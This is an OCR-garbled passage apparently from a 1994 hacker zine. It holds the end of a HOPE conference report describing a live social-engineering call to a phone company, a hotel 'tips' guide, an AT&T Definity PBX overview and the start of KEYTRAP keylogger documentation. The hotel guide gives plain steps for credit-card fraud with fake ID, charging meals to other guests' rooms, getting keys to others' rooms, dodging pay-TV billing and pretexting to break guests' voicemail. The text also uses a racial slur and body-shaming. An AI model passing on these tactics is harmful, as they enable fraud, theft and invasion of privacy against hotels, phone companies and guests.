company wants to have in the hands of a generation of kids who 
are so apathetic that they don’t even know they don’t give a 
shit. Nonetheless, the access to this capability is through an 
800 number and a PIN. 


Supernigger was going to show us how to acquire such privileged 
information. Live. "When you get some phone company person as 
dumb as a bolt on the other end, and you know a few buzz words. 
you convince them that it is in their best interest and that they 
are supposed to give you the information." 


"I’ve never done this in front of an audience before, so give me 
thr tries," h xplained to an anxiously foaming at the mouth 
crowd. No one took a cheap pot shot at him: tacit acceptance of 
his rules. 


Ring. Ring. 
"Operations. Mary." 


"Mary. Hi, this is Don Brewer in social engineering over at CIS, 
how’s it going?" Defuse. 


"Oh, fine. I guess." 


"I know, I hate working Sundays. Been busy?" 
"Nah, no more. Pretty calm. How can I help you?" 
"I’m doing a verification and I got systems down. I just need 


the C/NA. You got it handy?" Long pause. 


"Sure, lemme look. Ah, it’s 313.424.0900." 700 notebooks ap\037 
peared out of nowhere, accompanied by the sound of 700 pens 
writing down a now-public phone number. 


"Got it. Thanks." The audience is gasping at the stunningly 
stupid gullibility of Mary. But quiet was essential to the 
mission. 


"Here’s the PIN number while we’re at it." Double gasp. She’s 
offering the supposedly super secret and secure PIN number? Was 
this event legal? Had Supernigger gone over the line? 


"No, CIS just came up. Thanks anyway." 
"Sure you don’t need it?" 


"Yeah. Thanks. Bye." Click. No need to press the issue. PIN 
access might be worth a close look from the next computer DA 
wanna-be. 


An instant shock wave of cacophonous approval worked its way 
throughout the 750 seat ballroom in less than 2 microseconds. 
Supernigger had just successfully set himself as a publicly 
ordained Cyber Christ of Social Engineering. His white robes 
were on the way. Almost a standing ovation lasted for the better 
part of a minute by everyone but the narcs in the audience. I 
don’t know if they were telco or Feds of whatever, but I do know 
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that they were the stupidest narcs in the city of New York. This 
pair of dour thirty something Republicans had sphincters so tight 
you could mine diamonds out of their ass. 


Arms defiantly and defensively crossed, they were stupid enough 
to sit in the third row center aisle. They never cracked a smile 
at some of the most entertaining performances I have seen outside 
of the giant sucking sound that emanates from Ross Perot’s ears. 


Agree or disagree with hacking and phreaking, this was funny and 
unrehearsed ad lib material. Fools. So, for fun, I crawled over 
the legs of the front row and sat in the aisle, a bare eight feet 
from the narcs. Camera in hand I extended the 3000mm tele-photo 
lens which can distinguish the color of a mosquitoes underwear 
from a kilometer and pointed it in their exact direction. Their 
childhood acne scars appeared the depth of the Marianna Trench. 
Click, and the flash went off into their eyes, which at such a 
short distance should have caused instant blindness. But noth\037 
ing. No reaction. Nada. Cold as ice. Rather disappointing, but 
now we know that almost human looking narc-bots have been per\037 
fected and are being beta tested at hacker cons. 


Emmanuel Goldstein is very funny. Maybe that’s why Ed Markey and 
he get along so well. His low key voice rings of a_ gentler, 
kinder sarcasm but has a youthful charm despite that he is 30- 
something himself. 


"Sometimes you have to call back. Sometimes you have to call 
over and over to get what you want. You have to keep in mind 
that the people at the other end of the phone are generally not 
as intelligent as a powered down computer." He proceeded to 


prove the point. 


Ring ring, 

"Directory Assistance." 
WH" 

Ms err 

"Hi." 

"Can I help you." 

“Yes.” 

Pause. 

"Hello?" 

"Ha 

Me at 

"Can I help you.: 

"OK." 

Shhhhh. Ssshhh. Quiet. Shhhh. Too damned funny for words. 
"Directory Assistance." 

"I need some information." 
"How can I help you." 


"Is this where I get numbers?" 
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"What number would you like?" 
"Information." 

"This is information." 

"You said directory assistance." 
WT Hiss. Sesh 

"But I need information." 

"What information do you need?" 
"For information." 

"This is information." 

"What’s the number?" 

"For what?" 

"Information." 


"This is directory assistance." 


"T need the number for information." 
Pause. Pause. 
"What number do you want?" 


"For information." 


Pause. Guffaws, some stifled, some less so. 


"Hold on please." 

Pause. 

"Supervisor. May I help you?" 
Hi bras 

NAT 

Pause. 

"Can I help you?" 


"T need the number for information." 


"This is directory assistance." 

WAL a Ww 

WET 7 WwW 

"What’s the number for information?" 
"This is information." 


"What about directory assistance?" 


"This is directory assistance." 


"But I need information." 


16 


Funny stuff. 
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"This is information." 

"Oh, OK. What’s the number for information?" 
Pause. 

"Ah 411." 

"That’s it?" 

"No. 555.1212 works too." 

"So there’s two numbers for information?" 
WY.eS:." 


"Which one is better?" How this audience kept its cool 
beyond me. Me and my compatriots were beside ourselves. 


Pause. 

"Neither." 

"Then why are there two?" 

Pause. 

"T don’t know." 

"OK. So I can use 411 or 555.1212." 
"That’s right." 

"And which one should I use?" 

Pause. 

"411 is faster." Huge guffaws. Ssshhhh. Ssshhhh.. 
"Oh. What about the ones?" 

"Ones?" 

"The ones." 

"Which ones?" 


"The ones at the front of the number." 


"Oh, those ones. You don’t need ones. Just 411 or 555.1212... 


"My friends say they get to use ones." Big laugh. Shhhhhh. 


"That’s only for long distance." 


"To where?" How does he keep a straight face? 
Pause. 

"If you wanted 914 information you’d use a one." 
"T£ I wanted to go where?" 

"To 914?" 


"Where’s that?" 


was 
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"Westchester." 

"Oh, Westchester. I have friends there." 
Pause. 

"Hello?" 

"Yes?" 

"So I use ones?" 

"Yes. A one for the 914 area." 

"How?" 


Pause. 


"Put a one before the number." 
"Like 1914. Right?" 
"LOLA 599. LAD. ™ 

"All of those numbers?" 


"Yes." 


That’s three ones." 


That’s the area code." 


"I’ve heard about those. They confuse me." Rumbling 


and laughs throughout the hall. 


Pause. 


She slowly and carefully explained what an area code is 


chuckles 


to the 


howlingly irreverent amusement of the entire crowd except for the 


fool narcs. 


"That’s right." 

"And there’s two numbers I can use?" 
"Ves t W 

"So I got two numbers on one call?" 
MY Gaby ci a> aes" 


"Wow. Thanks. Have a nice day." 


kK kK kK kK 


Gl 


Comments heard around HOPE. 


Thanks. So I can call information and get a number?" 


Rop Gongrijjp, Hacktic: "The local phone companies use their own 


social engineers when they can’t get their own people 


them what they need to know." 


Sprint is using what they consider to b th 


to tell 


access 


mechanism since the guillotine. For all of us road warriors out 


there who are forever needing long distance voic 


servic from 


the Whattownisthis, USA airport, Sprint thinks they hav 


a better 


mousetrap. No more messing finger entry. No more pass-codes or 
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I remember at the Washington National Airport last summer I was 
using my Cable and Wireless long distance access card and entered 
the PIN and to my surprise, an automated voice came on and _ said, 
"Sorry, you entered your PIN with the wrong finger. Please try 
again." 


Sprint says they’ve solved this thorny cumbersome problem with a 


service called "The Voice Fone Card". Instead of memorizing 
another 64 digit long PIN, you just speak into the phone: "Hy 
it’s me. Give me dial tone or give me death." The voice recog\037 


nition circuits masturbate for a while to determine if it’s 
really you or not. 


Good idea. But according to Strat, not a good execution. Strat 
found that someone performing a poor imitation of his voice was 
enough to break through the front door with ease. Even a poor 


tape recording played back over a cheap cassette speaker was 
sufficient to get through Sprint’s new whiz-banger ID system. 


Strat laughed that Sprint officials said in defense, "We didn’t 
say it was secure: just convenient." 


Smart. Oh, so smart. 


kK kK kK kK Ok 


"If my generation of the late 60’s and early 70’s had had _ the 
same technology you guys have there never would have been an 
80’s." This was how I opened my portion of the author’s panel. 


= 


The authors panel was meant to give HOPE hackers insight into how 
they ar perceived from the so-called outside. I think the 
session achieved that well, and I understand the videos will be 
available soon. 


The question of electronic transvestites on AOL came up to every\037 
one’s enjoyment, and all of us on the panel retorted with a_ big, 
"So what?" If you have cyber-sex with someone on the ‘’Net and 
enjoy it, what the hell’s the difference? Uncomfortable butt 
shifting on chairs echoed how the largely male audience likely 
feels about male-male sex regardless of distance. 


"Imagine," I kinda said, "that is a few years you have a_ body 
suit which not only can duplicate your moves exactly, but can 
touch you in surprisingly private ways when your suit is connect\037 


ed to another. In this VR world, you select the gorgeous woman 
of choice to virtually occupy the other suit, and then the two of 
you go for it. How do you react when you discover that like 


Lola, '’I know what I am, and what I am is aman and so’s_ Lola.’" 
Muted acknowledgment that unisex may come to mean something 
entirely different in the not too distant future. 


"Ooh, ooh, please call on me." I don’t mean to be insulting, but 
purely for identification purposes, the woman behind the voice 
bordered on five foot four and four hundred pounds. Her bathtub 
had stretch marks. 


I never called on her but that didn’t stop her. 


"I want to know what you think of how the democratization of the 
internet is affected by the differences between th government 
and the people who think that freedom of the net is the most 
important thing and that government is fucked but for freedom to 
be free you have to have the democracy behind you which means 
that the people and the government need to, I mean, you know, and 
get along but the sub culture of the hackers doesn’t help the 
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government but hackers are doing their thing which means that the 
democracy will not work , now I know that people are laughing and 
giggling (which they were in waves) but I’m serious about this 
and I know that I have a bad case of hypomania but the medication 
is working so it’s not a bad as it could be. What do you think?" 


I leaned forward into the microphone and gave the only possible 
answer. "T dunno. Next." The thunderous round of applause 
which followed my in-depth response certainly suggested that my 
answer was correct. Not politically, not technically, but 9 anar\037 
chistically. Flexibility counts. 


kK kK kK kK Ok 


= 


HOPE was attended by around one thousands folks, and the Hotel 
Filthadelphia still stands. (Aw shucks.) 


My single biggest complaint was not that the schedules slipped by 
an hour or two or three; sessions at conferences like this keep 
going if the audience is into them and they are found to _ be 
educational and productive. So an hour session can run into two 
if the material and presentations fit the mood. In theory a 
boring session could find itself kama kazi’d into early melt-—down 
if you have the monotone bean counter from hell explaining the 
distributed statistical means of aggregate synthetic transverse 


digitization in composite analogous integral fruminations. 
(Yeah, this audience would buy off on that in a hot minute.) But 
there were not any bad sessions. The single track plenary style 
attracted hundred of hackers for every event. Emmanuel and 


friends picked their panels and speakers well. When dealing with 
sponge-like minds who want to soak up all they can learn, even in 
somewhat of a party atmosphere, the response is bound to be good. 


My single biggest complaint was the registration nightmare. i*d 
rather go the DMV and stand in line there than get tagged by the 


seemingly infinite lines at HOPE. At DefCon early registration 
was encouraged and the sign up verification kept simple. 


For some reason I cannot thoroughly (or even partially) fathom, a 
two step procedure was chosen. Upon entering, and before the 
door narcs would let anyone in, each attendee had to be assigned 
a piece of red cardboard with a number on it. For the first day 
you could enter the ’exhibits’ and auditorium without challenge. 
But by Day 2 one was expected to wait in line for the better part 
of a week, have a digital picture taken on a computer tied to a 
CCD camera, and then receive a legitimate HOPE photo-ID card. 
What a mess. I don’t have to beat them up on it too bad; they 
know the whole scheme was rotten to the core. 


I waited till near the end of Day 2 when the lines were gone and 
the show was over. That’s when I got my Photo ID card. I used 
the MIB’s photo ID card the rest of the time. 


HOPE was a lot of fun and I was sorry to see it end, but as all 
xperiences, there is a certain amount of letdown. After a great 
vacation, or summer camp, or a cruise, or maybe even after Wood\037 
stock, a tear welts up. Now I didn’t cry that HOPE was over, but 
an intense 48 hours with hackers is definitely not your average 
computer security convention that only rolls from 9AM to Happy 
Hour. At a hacker conference, you snooze, you lose. You never 
know what is going to happen next - so much is spontaneous and 
unplanned - and it generally is highly educational, informative 
and entertaining. 


Computer security folks: you missed an event worth attending. 
You missed some very funny entertainment. You missed som fin 
young people dressed in some fine garb. You missed the chance to 
meet with your perceived ’enemy’. You missed the opportunity to 
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get inside the heads of the generation that knows more about 
keyboards than Huck Finning in suburbia. You really missed 
something, and you should join Robert MIB Steele and I at the 
next hacker conference. 


kx kK kK kK 
If only I had known. 
If only I had known that tornadoes had been dancing up and down 


5th avenue I would have stayed at the Hotel Filthadelphia for 
another night. 


La Guardia airport was closed. Flights were up to 6 hours de\037 
layed if not out and out canceled. Thousands of stranded travel\037 
ers hunkered down for the night. If only I had known. 


Wait, wait. Hours to wait. And then, finally, a plane ready and 
willing to take off and swerve and dive between thunderbolts and 
twisters and set me on my way home. 


My kids were bouncing out of the car windows when my wife picked 
me up at the airport somewhere in the vicinity of 1AM. 


"Not too late are you dear?" Sweet Southern Sarcasm from my 
Sweet Southern Wife. 


"Don’t blame me," I said in all seriousness. "It was the hack\037 
ers. They caused the whole thing." 


Ke SKS RO 


Notice: This article is free, and the author encourages responsi\037 
bl widespread electronic distribution of the document in full, 


not piecemeal. No fees may be charged for its use. For hard 
copy print rights, please contact the author and I’11l make you an 
offer you can’t refuse. The author retains full copyrights to 


the contents and the term Cyber-Christ. 


Winn is the author of "Terminal Compromise", a novel detailing 

a fictionalized account of a computer war waged on the United 
States. After selling well as a book-store-book, Terminal Com\037 
promise was placed on the Global Network as the world’s first 
Novel-on-the-Net Shareware and has become an underground classic. 
(Gopher TERMCOMP. ZIP) 


His new non-fiction book, "Information Warfare: Chaos on the 
Electronic Superhighway" is a compelling, non-technical analy\037 
sis of personal privacy, economic and industrial espionage and 
national security. He calls for the creation of a National 
Information Policy, a Constitution in Cyberspace and an Elec\037 
tronic Bill of Rights. 


He may be reached at INTER.PACT, 11511 Pine St., Seminole, 
FL. 34642. 813-393-6600, fax 813-393-6361, E-Mail: 
POO0506@psilink.com. 
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The ABCs of better HOTEL Staying 


by SevenUp (sec@escape.com) 


This ARTICLE will give you some information on how to experience 

a cheaper, safer, and more comfortable stay at your next hotel visit. 
Always keep in mind that the staff is taught to make your stay 

as pleasant as possible and fulfil most of your wishes. So it is often 
a matter of social engineering to reach your goal. 


BUSINESS CENTRES 

Many good hotels offer business centres. Some business centres just offer 
"typing service" at high rates, others provide a PC you can use for free. 
Usually it is a 286 or older, but it should give you the opportunity 

to copy warez, write your latest article for Phrack or even connect your 
pocket modem and login to the -> Internet. 


CREDIT CARDS 

If you have your own card and don’t mind paying for the room - great! 
Just use it when you check in - most places require you to have a credit 
card or won’t let you use the phone or won’t even let you in. 

You want to use someon lse’s card? Be careful! Don’t use a stolen 

card when you check in, or you won’t have a safe sleep, fearing that they 
could come and get you. You would be safer if you tell them upon check in 
that you misplaces your card and don’t need to make long distance calls, 
and just want to pay with it in the end. This doesn’t work always, but 
sometimes. You also need a faked ID upon check in with the same name as 
the cardholder. 


But overall, using a faked Credit Card in a hotel is one of the easiest ways 
to get busted. 


DIALUPS 

Many hotels have dialins for their reservation system. Novells are quite 
popular. Some hotels also use PC based UNIXes (old System V’s mostly) 
that are often unprotected - no passwords on the root account or even 
giving you a shell prompt when you call the dialup. Most of them are Jel 
at slow speeds. I won’t say more about reservation systems here. 


EATING & DANCING 

Many hotels have good and relatively expensive restaurants and discos. 
They just require you to sign the check with a room number and full name. 
If you know of a guest that is checked in and has secured his account with 
a credit card who just checked in, just use his name and room number - 
this is probably the biggest lack of security in a hotel. 


Also if you don’t stay at the hotel but want to go to their disco at night, 
pretend to be a guest to get in free and save cover charges. They usually 
believe you. 


FUCKING 

You've read right, hotels are favorite places to make love. No matter 
if you bring your IRC date here, pick up a hooker or stay alone and 
watch the in-house porn movies. Since many hotels pride themselves in 
having as much staff as guests, the question is how to get the cute 
waitresses and maids into your bed. If anyone has experience making 
them willing without much financial and physical effort, drop me a 
mail and I will include it in the next list. 


GET ALL 
Some people love to take all movable parts from the room before checking 
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out. The question is what to take and what not. 


The easiest things to take are soaps, shampoo, lotions and Kleenex from 
the bathroom, since they will be replaced every morning without problems. 
If you want a bathrobe (usually most expensive item), hide it in your 
suitcase immediately after check in and then complain that there was just 
fe) 

t 

c 

W 


ne robe in your room. They will bring you a new one immediately. If you 
ake one when you leave the hotel, they will notice and most likely 

harge you $100 in your credit card. If you want a bath towel, also don’t 
ait until the end of your stay, but hide it some days earlier. If anyone 
should ask about it, just tell him that you left it at the pool. 

Taking magazines from your room is usually no problem, but stay away 

from removing the TV or blankets! 


HYATT GOLD PASSPORT 
If you want to check in at a Hyatt, get yourself their Gold Pass before. 
It is free of charge and will get you free Orange Juice, Coffee anda 
newspaper in the morning, and also a bigger room. 


NTERNE 
o you are at a hotel in a new city and want to get on the Internet? 

here are usually 2 ways: Using a computer and a modem from your hotel room 
nd calling a dialup, or walking to a local university and logging in from 
here. 


toHONH 


If you bring your laptop with built-in modem, find the dialup in the 
Internet Dialup list in this issue of Phrack, get an account on the host 
and can make free local calls from your room, the first choice is probably 
the best one. 


But if you don’t have your own account at a local school and want to 

stay legit, it is often useful to walk to a computer lab in that school 

and check out their computers. Many school around the world have PC’s 

in their labs which let you do a telnet throughout the world without 

needing any account or password, or ID to enter the school. You can find 

them in Hong Kong, New York, Munich and many other major cities; but usually 
they are unknown to the public or are likely to be closed down (similar to the 
vending machines, see -—> SEVENUP). 


JACKING OFF 
See -> Fucking. 


KEY 

There are plenty of different types of room keys. Some hotels still use 
old-fashioned standard keys, but most use programmable keys (plastic cards 
with "holes" or magnetic stripes, or even the pretty modern metal keys 

in key-shape, which allow programming of their magnetic fields. These 
programmable keys will always be reprogrammed if a guest checks out. 

On the other hand, if you go to the reception and claim that you lost 
your key, they will always program a spare key for you. Sometimes they 
ask you for your birthday, sometimes for your ID (just tell them you 
left it in your room). This way you could easily get into someone else’s 
room. 


LIGHT 

Some hotels have quite fancy light systems. If the light won’t shine, 
there is often a box in the entrance where you have to enter your key 
(or some paper) to activate the main power. This should help saving 
energy while you are gone, but sometimes even the air condition will 
turn off, so you have to fool the box with a paper or spare key. 

Some systems will turn on certain lights just when you insert the key 
at 

s 

t 


nto the door and open it. This is quite unfortunate if your roommate 
leeps while you go cruising and clubbing at night. When you return, 
he light will shine bright and wake him up. The only thing that helps 
is unscrewing the light bulbs. 


MOVIES & TV 
I bet many of you will first turn on the TV after entering the room. 
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Some people just stay at hotels that offer HBO in their rooms. 

Before playing with the remote, read the papers above the TV carefully, 
because some channels might show in-house movies that are being charged 
automatically without any warning. Typical rates are US $6-9 per movie. 
Of course you don’t want to pay that much, nor do I. 


Here are the 3 big S’ of movie watching: 
Spectravision, Sex movies and Social Engineering. 


Spectravision is one of the most popular systems. It usually allows you 

to watch 5 minutes (sometimes 2) of each movie per day free, enough for 
some people to come. There are usually a bunch of BNC cables from the 

wall to your Spectravision box and to your TV. One of the cables delivers 
the program, the other assures billing. Use your fantasy and try replacing 
the "billing cable" in the wall! Generally it can also be useful to use 

a standard cable decoder (cablebox) to decode the pay channels. Just bring 
one along and if you are lucky, you can watch the movies easily. 


If all your technical expertise fails, there is still one way of watching 
movies for free: Social Engineering. Just watch the movies of your choice 
and then complain to the reception that you had trouble with the TV, 

that the Spectravision box or remote control broke, or that you caught 

the maid watching movies in your room. If you cry a lot, they will usually 
be nice and remove the movies from your bill. 


PHONE CALLS 

Be careful before making any phone calls from your room. Many hotels 

charge you up to $3 for 800 numbers and log all your touch tones (and 
calling codez!). You can’t be sure who will view the logs and abuse your 
calling card. Also there are often high surcharges for long distance calls, 
up to 40% on top of AT&T’s operator connected charges. There are also hotels 
that charge a minimum charge per call (up to $5), even if you just talked 
for 10 seconds long distance. On the other side, some hotels offer free local 
and 800 calls. Just make sure and read all papers in the room and contact 
t 
s 


he reception. I also had operators telling me lower rates than the ones that 
howed up on my bill, so be careful. 


RACK RATE 
This is the highest possible rate for a room, and the rate that is officially 
displayed at the reception. You should never pay that rate. If you say you 
are with a company they will give you a discount of at least 10% (corporate 
rate). Some hotels even give qualified people and companies discounts of 

25% —- 50% on the rack rate. When you wonder if you pay too much for your 

room or think you got a great rate, send me a mail, because I try to keep 

a database about cheapest prices for selected hotels. 


SEVENUP, Coke, Pepsi & Rootbeer: 

You are staying at a five-star hotel. You are thirsty. Your room has 

a minibar, but the cheapest soda is $4.95. The next supermarket or gas 
station is 20 miles away. But you need a Coke. What to do now? 


TRY finding the gangways where th mployers work, live and eat! 
About every bigger hotel has a kitchen for employees. They also have 
a vending machine hidden somewhere, with sodas for just 60 cents. 


When strolling through the restricted area, just walk straight, slowly 

and self confident. If someone asks you what you are doing, tell them: 

a) you are an undercover agent for the IRS and they should get lost. 

b) you are looking for the vending machine. (telling the truth openly 
with a broad smile can be more successful than you think!) 

c) you are a new employ and ask her to show you around 


Also notice the signs and posters in most restricted areas, telling 
the personnel to be "enthusiastic, punctual, generous to the guest..." 
Quote these phrases when an employer behaves nasty towards you. 


UPGRADES 
After first going into your room and checking it out, go back to 
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the reception and complain that the bed is too small, the street noise 
is too loud, the view is too poor, etc. Quite often they will give you 
a nicer and bigger room on their executive floor! See also -> Hyatt 
Gold Passport. 


VOICE MATL 

Many good hotels offer voice mail to their guests. The most popular 

system is Meridian Mail. Some hotels have an own dialup for the voicemail, 
but mostly the hotel just lets you access it through the main PBX operator. 
If you are unlucky you have to wait 5 rings at a number before th 

Voice Mail answers. 


Most guests don’t use Voice Mail. The few that do also keep the default 
password, which is often the room number or the birthday of the guest. 
One way to get the birthday is call up front desk, tell them you are 
with "Mommy’s Birthday Cakes Delivery" and have a cake for John Smith. 
Ask them to check birthday’s of all John Smith’s etc. Of course there 
are more ways, just use your social engineering fantasy! 


WHERE TO GO? 

It is pretty hard to recommend chains in general. But I had quite 
good experience with Hilton, Hyatt (try getting a room on the Regency 
floor), Holiday Inn (sometimes really cheap prices and good standard), 
Shangri-La (best hotels in Asia) and Marriott (usually nice service). 
I had less good experience with Sheraton (less discounts), Peninsula, 
Regent & Four Seasons (all a bit overpriced and not so modern). But 
there are always exceptions, so tell me about your experience! 


I hope some of these tips might be useful for you. Stay tuned and wait 
for a new issue of travel tips, next time about Airlines! 


(c)opyright 1994 by the author. Publication outside of Phrack forbidden. 
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AT&T Definity System 75/85 
Communications System 
Description & Configuration 


Written By: erudite 
(armitage@dhp.com) 


Let me introduce you to the AT&T Definity System 75/85. This communications 
system is a product of the merging of the AT&T System 75 and System 85 
architectures. The name Definity came from the two words "definitive" and 
Ninftincey"™. 


Let me also tell you that there are many different communications systems 
out there. (Merlins, AT&Ts) Many many many, I couldn’t name them all, but 
the AT&T systems are nice. I enjoy working with them, and I hope you enjoy 
this text file. 


This System is an advanced business communications system. A Digital 
Communications Protocol (DCP) allows data communication through data 
terminal equipment connected to the digital switch. This allows the 
system to handle data and voice communications simultaneously. 


The System can handle up to 1600 lines that supports all digital, hybrid, 
and analog terminals and equipment. Up to 400 trunks, and up to 400 
Automatic Call Distribution (ACD) Agents. The Data switching capacity is up 
to 800 digital data endpoints, and 160 integrated and combined pooled modem 
facilities. 


510D Personal Terminal or 515-Type Business Communications Terminal 
7404D Terminals 

~ 7406D or 7407D Equipped with optional Data Module Base 

Asynchronous Data Units (ADU) (DCE type device that has rs232c interface) 
Digital Terminal Data Modules 

~ 3270 Data Modules 

Internal Data Channels 

Trunk Data Modules (Modular) 

Processor Data Modules (Modular) 


The Processor Port Network (PPN) always provides the switch processing 
element (SPE) and port circuits. An Expansion Port Network (EPN) is 
available to increase line size of any system by allowing you to add 
additional port circuits. The EPN connects to the PPN over a fiber 
optic cable that may be up to 1.86 miles remotely situated. It may also 


by located adjacent to the PPN. 


This System may be arranged stand-alone or you can integrate it into a 
private network. You can form these types of Networks: 

Tandem Tie Trunk Network (TTTN) 
Electronic Tandem Network (ETN) 
Main/Satellite Configuration 
Distributed Communications System (DCS) 
Centralized Attendant Service (CAS) 


25.txt Wed Apr 26 09:43:41 2017 2 


An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI) 
makes it possible for the Definity System to access various private and 
public network services. With ISDN-PRI the you can access these services: 
~ Call by Call Service Selection 
Private Network Services 
~ Information Forwarding 
~ Cal Identification Display 

— Connected Number Display 

— Connected Party Name Display 

—- Calling and Called Number Record Display 

—- Calling and Called Party Name Display 


Configuration 


The Actual System is encased in a pair of "cabinets" which have a fiber 
optic link between them. It is also common to have a stack of about three 
"cabinets" of a smaller size, for different models. 


Shown here is a typical multi-carrier system with a Processor Port Network 
(PPN) cabinet and Expansion Port Network (EPN) cabinet. 


attendant outside trunks outside private line 
consoles and lines / data transmission equipment or 
\ \ / analog switched network 
\ fiber optic | 
| connection | __. business communication 
| /~\ / terminals 
AT&T | | AT&T 
DEFINITY | | DEFINITY +------ . = HOA a 
---+ SYSTEM [i SYSTEM <> [audix] / terminals 
/ 75/85 | | 75/85 modular data / 
| [4 Gh + processor 
manager | | | +’optional host 
terminal | | <> + | computer or call 
| 


/ [] t, | management system 
/ asynchronous | 
single line data unit \__ data 
voice terminals terminals 


Voice and Data 
Management Features 


There are a lot of voice features and services, in fact, too many to list, I 
will do a run down on all the interesting and useful features and services. 
It has many Voice Management, Data Management, Network Services, System 
Management, Hospitality Services, and Call Management Services. 


call attendant can use to operate the console mor fficiently 

both inside system users and remote callers to edit, receive, send, 

write, and forward voice messages. 

system. 

it to the display console. 

—- Attendant Conference: Allows Attendant to construct a conference call 

- Terminal Conference: Allows remote user to construct a conference call 

without attendant assistance. 

being interrupted by any of the systems overriding features, and denies 

ability to gain access to, and or superimpose tones. 

is issued by the administrator to a certain extension # for indication of 

a dedicated private data extension. 

the system to dial anyone else, such as the attendant console. 

the following trunks and more. 
Voice Grade DS1 Tie Trunks 
Alternative Voice/Data (AVD) DS1 Tie Trunks 
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Digital Multiplexed Interface (DMI) Tie Trunks 
Central Office (CO) Trunks 

ISDN-PRI Trunks 
Remote Access Trunks 

Wide Area Telecommunications Service (WATS) Trunks 

features and functions that is used for maintenance testing. Such as access 
to system tones, access to specific trunks, etc. 

Note: AT&T designed the Facility Test Calls Feature for testing 
purposes only, and system maintenance. When properly 
administered, AT&T claims that the customer is responsible for 
all security items, and secure system from unauthorized users, 
and that all users should be aware of handling access codes. 
AT&T claims they will take no responsibility for poor 
administration. 

it rings down if busy, or if it receives a dial timeout. 
packet switched local area network that will link with mainframes, 
workstations, personal computers, printers, terminals, storage devices, 
and communication devices. 
This interface allows connection of the system to an ISDN Network by means 
of ISDN frame format called PRI. 
branch has a Listed Directory Number (LDN). 

Common Control Switching Arrangement (CCSA) 
Electronic Tandem Network (ETN) 
Enhanced Private Switched Communications Service (EPSCS) 
Tandem Tie Trunk Network (TTTN) 
Software Defined Network (SDN) 
doesn’t want to take responsibility for anything that is abused with this 
feature. 
would come in handy. 
others calls, again, AT&T does not want to take any legal fees on misuse 
on this feature. 
attendant’s assistance. 


The System comes with switched services software, administrative software, 
and maintenance software. All running on a real-time operating system. 


and services. This also is responsible for relaying any information to the 
console display. 

tasks, and configurations. 

keep everything running properly. 


System Administration 


The "Access Code" you will encounter on these systems is al, 2, or 3 digit 
number. The pound (#) and star (*) keys can be used as the first digit of the 
code. Below you will see a typical Screen Format taken from one of my logs, 
information aside you can see and get a feel of what the administration side of 
the system is like. 

Page 1 of 4 


STATION 
Extension: 
Type: Lock Messages: _ COR: _ Room: 
Port: Security Code: COS: _ Jack: 
Name: Coverage Path: Cable: 
FEATURE OPTIONS 
LWC Reception? Headset? _ Coverage Msg Retrieval? _ 
LWC Activation? _ Auto Answer? _ Data Restriction? _ 


Redirect Notification? _ Idle Appearance Preferences? _ 
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PCOL/TEG Call Alerting? _ 
Data Module? _ Restrict Last Appearance? _ 
Display? _ 


ABBREVIATED DIALINGS 


Listl: List2: Liste3: 


BUTTON ASSIGNMENTS 


Oe WN EF 
WO OAD 


System Maintenance 


Finally the Maintenance section, where you can s where th rrors are 
logged, where all the alarms are sent, printed, etc. 


There are 3 different types of alarms: 
console or INADS) 


The Error log is reported and can be viewed at The Manager Terminal, 
as well as the alarm log. 


Basic Acronyms 


ADU Asynchronous Data Unit 

AUDIX Audio Information Exchange 

COR Class of Restriction 

COS Class of Service 

DCP Digital Communications Protocol 
DMI Digital Multiplexed Interfac 
EPN Expansion Port Network 

ISDN Integrated Service Digital Network 
PPN Processor Post Network 

PSDN Packet Switching Data Network 
Tones 


Here is most of the Tones, mostly either interesting ones or often used 
tones the System. Here are the tones, the frequencies, and the moderations. 


Tone Frequency Pattern 
Answer Back 3 2225 Hz 3000 on 
Answer Back 5 2225: HZ 5000 on 
Bridging Warning 440 Hz 1750 on, 12000 off, 
650 on; repeated 
Busy 480 Hz + 620 Hz 500 on, 500 off; repeated 
Call Waiting 
Internal 440 Hz 200 on 
External 440 Hz 200 on, 200 off 
Attendant 440 Hz 200 on, 200 off 
Priority Call 440 Hz 200 on, 200 off, 200 on, 
200 off, 200 on 
Call Waiting 
Ring Back 440 Hz + 480 Hz; 900 on (440 + 480) 
440 Hz 200 on (440) 2900 off; repeated 
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Cnrt Att Call 
Incoming Call 
Identification 480 Hz & 440 Hz 100 on (480), 100 on (440), 
& 480 Hz 100 on silence; 


Dial Zero, 
Attendant Transfer, 


Test Calls, 440 Hz 100 on, 100 off, 100 on 
Coverage 440 Hz 600 on 
Confirmation 350 Hz + 400 Hz 100 on, 100 off, 100 on, 
100 off, 100 on 
Dial 250 Hz + 400 Hz Continuous 
Executive Overrid 440 Hz 300 on followed by 
Intercept 440 Hz & 620 Hz 250 on (440), 
250 on (620); repeated 
Ringback 440 Hz + 480 Hz 1000 on, 3000 off; repeated 
Zip 480 500 on 
Outro 


System 75/85 (multi-carrier cabinet model) communications system. 


I hope you learned something, anywayz, questions comments, system login 
information, defaults, where to get manuals, or anything else: 
email me (armitage@dhp.com) and I will get back to you. 


eS BEGIN PGP PUBLIC KEY BLOCK--—---— 
Version: 2.3a 


mOQCNAi 4sSHnSAAAEEAL jw8E+bOEr1BlCyrBp8 f3Ko8yOX5P5uiP+Vor5SamJ33gbu 
PBSBOct+Xww+93P j1/R7gMC/c/FFtn+ehHsCm5u3AalXSmx2ZVW2 Xen 9vXBRMZRB+ 
rpC2GdCiFCAdfaHwANHaeuHDmKiP4GqaQuG1M1Xzv9Nqw4m70tndGYkB59s1lAAUT 
tAdFcnVkaXR1 


Ree END PGP PUBLIC KEY BLOCK---—-—— 


erudite (armitage@dhp.com) (armitage on irc) \032 
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KEYTRAP vl.0 - Keyboard Key Logger 
by Dcypher (Dcypher@aol.com) 


THIS PROGRAM MAY NOT BE DISTRIBUTED IN ANY WAY THAT VIOLATES U.S. OR 
FOREIGN LAW. THIS PROGRAM MUST NOT BE USED TO GAIN UNAUTHORIZED ACCESS 
TO DATA AND IS NOT INTENDED TO HELP USERS TO VIOLATE THE LAW ! 


5 


You may distributed UNMODIFIED copies of KEYTRAP freely, subject to the 
above limitations, and provided all files are included in unmodified 
form; KEYTRAP.EXE, KEYTRAP.DOC 


The author disclaims ALL warranties relating to the program, whether 
express or implied. In absolutely no event shall the author be liable 
for any damage resulting from the use and/or misuse of this program. 


WHAT IS KEYTRAP ? 


KEYTRAP is a very effective keyboard key logger that will log 
keyboard scancodes to a logfile for later conversion to ASCII 
characters. Keytrap installs as a TSR, remaining in memory 
until the computer is turned off. 


